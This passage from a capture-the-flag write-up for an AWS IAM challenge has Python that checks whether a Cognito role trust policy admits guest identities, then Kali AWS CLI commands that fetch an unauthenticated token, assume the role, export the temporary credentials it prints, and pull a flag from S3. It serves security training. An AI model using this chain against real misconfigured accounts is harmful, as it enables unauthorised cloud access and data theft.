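IDENTITY_POOL = "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"

# OpenID token returned by get-open-id-token in this challenge (copied from this page)
PAGE_OPENID_TOKEN = (
    "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0."
    "eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVjYi1jMjQ5LWZhZDgtYTY2MTc2ZjY0YmU0IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQy"
    "LTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlk"
    "ZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDU3NTk0NjAsImlhdCI6MTc0NTc1ODg2MH0."
    "GgPIR6lvxMwDZGwkq7e6WdSSZF_iX0IKnNFJcxCUCGUfSMRTnCQQGW2WVujUbge6oM_EJqQCzW80ZRHplkzLm8oicPBnyMvWD9rFSVK3K6oe"
    "98YWOCEkpTwdVq6k3VwUFq8jhFwA-Paralhcs2YAxhExI1H0fSOyetSfAgcid9w98ORlsVi5UF5Y9e438ktABb28OPVios4uxzl3gZmGI4PAe"
    "Gs_WLn6yLhlIDqLiO9CTT8obrjzXI7MkOGXyYB9li095VQE_SYVVqgp7OqbvFNmoxIKaBdi_tFmpDQoF6aqplYzjb4lhcW16g0rRW9Fh1utwS"
    "31AJjcuozQZYaW7A"
)

# Role trust policy quoted above for challenge 6
TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "cognito-identity.amazonaws.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {"cognito-identity.amazonaws.com:aud": IDENTITY_POOL}},
    }],
}

# Same policy with the amr condition AWS uses for authenticated-only roles (my addition for comparison)
HARDENED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "cognito-identity.amazonaws.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {"cognito-identity.amazonaws.com:aud": IDENTITY_POOL},
            "ForAnyValue:StringLike": {"cognito-identity.amazonaws.com:amr": "authenticated"},
        },
    }],
}


def as_list(x):
    return x if isinstance(x, list) else [x]


def decode_jwt_payload(token):
    """Base64url-decode the claims segment of a compact JWS. Inspection only: no signature check."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def trust_policy_admits_unauthenticated(policy):
    """True when some Allow for sts:AssumeRoleWithWebIdentity lacks an amr condition
    requiring 'authenticated', i.e. guest identities of the pool can assume the role."""
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or "sts:AssumeRoleWithWebIdentity" not in as_list(st.get("Action", [])):
            continue
        required_amr = []
        for pairs in st.get("Condition", {}).values():
            for key, value in pairs.items():
                if key.lower() == "cognito-identity.amazonaws.com:amr":
                    required_amr += as_list(value)
        if "authenticated" not in required_amr:
            return True
    return False


def token_summary(token, expected_aud):
    """What a reviewer wants to know about a Cognito OpenID token: who issued it, for which pool, and how the identity authenticated."""
    claims = decode_jwt_payload(token)
    return {
        "issuer_ok": claims.get("iss") == "https://cognito-identity.amazonaws.com",
        "audience_ok": claims.get("aud") == expected_aud,
        "authenticated": "authenticated" in claims.get("amr", []),
        "amr": claims.get("amr", []),
    }


if __name__ == "__main__":
    print(token_summary(PAGE_OPENID_TOKEN, IDENTITY_POOL))
    print("challenge policy admits guests:", trust_policy_admits_unauthenticated(TRUST_POLICY))
    print("hardened policy admits guests: ", trust_policy_admits_unauthenticated(HARDENED_TRUST_POLICY))
```

The decoded claims show amr ["unauthenticated"] for the token the challenge hands out, and the challenge's trust policy accepts it because it never looks at amr; the hardened copy would reject the same token at the AssumeRoleWithWebIdentity step.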

Since Cognito is involved, we proceed the same way as before.

# Use the identity pool ID to get an IdentityId
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
    "IdentityId": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4"
}

# Use the IdentityId to get a token
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eecb-c249-fad8-a66176f64be4
{
    "IdentityId": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVjYi1jMjQ5LWZhZDgtYTY2MTc2ZjY0YmU0IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDU3NTk0NjAsImlhdCI6MTc0NTc1ODg2MH0.GgPIR6lvxMwDZGwkq7e6WdSSZF_iX0IKnNFJcxCUCGUfSMRTnCQQGW2WVujUbge6oM_EJqQCzW80ZRHplkzLm8oicPBnyMvWD9rFSVK3K6oe98YWOCEkpTwdVq6k3VwUFq8jhFwA-Paralhcs2YAxhExI1H0fSOyetSfAgcid9w98ORlsVi5UF5Y9e438ktABb28OPVios4uxzl3gZmGI4PAeGs_WLn6yLhlIDqLiO9CTT8obrjzXI7MkOGXyYB9li095VQE_SYVVqgp7OqbvFNmoxIKaBdi_tFmpDQoF6aqplYzjb4lhcW16g0rRW9Fh1utwS31AJjcuozQZYaW7A"
}

With the token we can call assume-role-with-web-identity to obtain STS credentials:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name c1trus --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVjYi1jMjQ5LWZhZDgtYTY2MTc2ZjY0YmU0IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDU3NTk0NjAsImlhdCI6MTc0NTc1ODg2MH0.GgPIR6lvxMwDZGwkq7e6WdSSZF_iX0IKnNFJcxCUCGUfSMRTnCQQGW2WVujUbge6oM_EJqQCzW80ZRHplkzLm8oicPBnyMvWD9rFSVK3K6oe98YWOCEkpTwdVq6k3VwUFq8jhFwA-Paralhcs2YAxhExI1H0fSOyetSfAgcid9w98ORlsVi5UF5Y9e438ktABb28OPVios4uxzl3gZmGI4PAeGs_WLn6yLhlIDqLiO9CTT8obrjzXI7MkOGXyYB9li095VQE_SYVVqgp7OqbvFNmoxIKaBdi_tFmpDQoF6aqplYzjb4lhcW16g0rRW9Fh1utwS31AJjcuozQZYaW7A
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXOCRBAHV7",
        "SecretAccessKey": "uJNHJIFIXl4CVGtCFfwMtJpsL1/33qZtUWBb8XE4",
        "SessionToken": "<session token omitted>",
        "Expiration": "2025-04-27T14:02:47+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:c1trus",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/c1trus"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

Export the environment variables:

export AWS_ACCESS_KEY_ID=ASIARK7LBOHXOCRBAHV7
export AWS_SECRET_ACCESS_KEY=uJNHJIFIXl4CVGtCFfwMtJpsL1/33qZtUWBb8XE4
export AWS_SESSION_TOKEN="<session token omitted>"

Find the flag file in the wiz-privatefiles-x1000 bucket:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3 ls                      
2024-06-06 02:21:35 challenge-website-storage-1fa5073
2024-06-06 04:25:59 payments-system-cd6e4ba
2023-06-04 13:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 09:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 12:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 09:28:31 wiz-privatefiles
2023-06-05 09:28:31 wiz-privatefiles-x1000

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3api get-object --bucket wiz-privatefiles-x1000 --key flag2.txt flag2.txt
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-06-05T13:28:35+00:00",
    "ContentLength": 40,
    "ETag": "\"48b4d561fb4900a861fa55626be4a103\"",
    "ContentType": "text/plain",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}
                                                                                                                                                
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# ls
challenge2  flag2.txt
                                                                                                                                                
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# cat flag2.txt     
{wiz:open-sesame-or-shell-i-say-openid}
